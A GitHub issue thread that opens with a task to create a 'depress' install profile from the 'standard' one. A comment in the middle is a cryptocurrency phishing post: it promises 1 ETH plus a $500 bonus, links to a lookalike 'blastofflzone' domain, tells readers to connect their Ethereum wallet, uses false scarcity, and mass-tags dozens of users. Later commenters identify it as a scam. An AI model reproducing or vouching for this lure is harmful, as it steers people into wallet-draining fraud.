### ISSUE TITLE
establish a 'depress' install profile

### ISSUE THREAD

**Issue by emjayess** [emjayess/depress#1]
- [x] start with a copy of 'standard' install profile

**Comment by muralinori** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
majbbtech, @hajidalakhtar, @trangle157, @jsonmaur, @chey, @shailesh17, @Username-Josh, @joenie01, @akshxy12, @johnpatek, @ericjprouty, @jonschoning, @suelsp, @LukaAvbreht, @SHACoreDev, @AlexBorsody, @raunak51299, @Skuff-Aldrin, @rothanachoun, @pedoc, @tahtacipolat, @hisaza, @Cryptoayinbest, @brightluke, @komen205, @LichFaker, @1ukidev, @tieubinhco, @st0yanov, @arjun155, @frozenblueman, @d4rkd3v1l, @HYMDominating, @alvinrumbaoa, @febryardiansyah, @kittu1432, @puroong, @CobbCoding1, @bvolpato, @JOAO-FELIPE-2000, @Chromus-dev, @TestGifts, @salvadormrf, @felixweinberger, @spencerpro, @integrate-your-mind, @Abhisheklg, @arstagaev, @pv-ajay-thota, @jonasstrehle

**Comment by raunak51299** [comment]
This issue is being used for crypto scam

**Comment by johnpatek** [comment]
> This issue is being used for crypto scam

@emjayess if you have access to this repo still you should close this issue and report any users engaging in such activity.

**Comment by emjayess** [comment]
Goodness, this is old
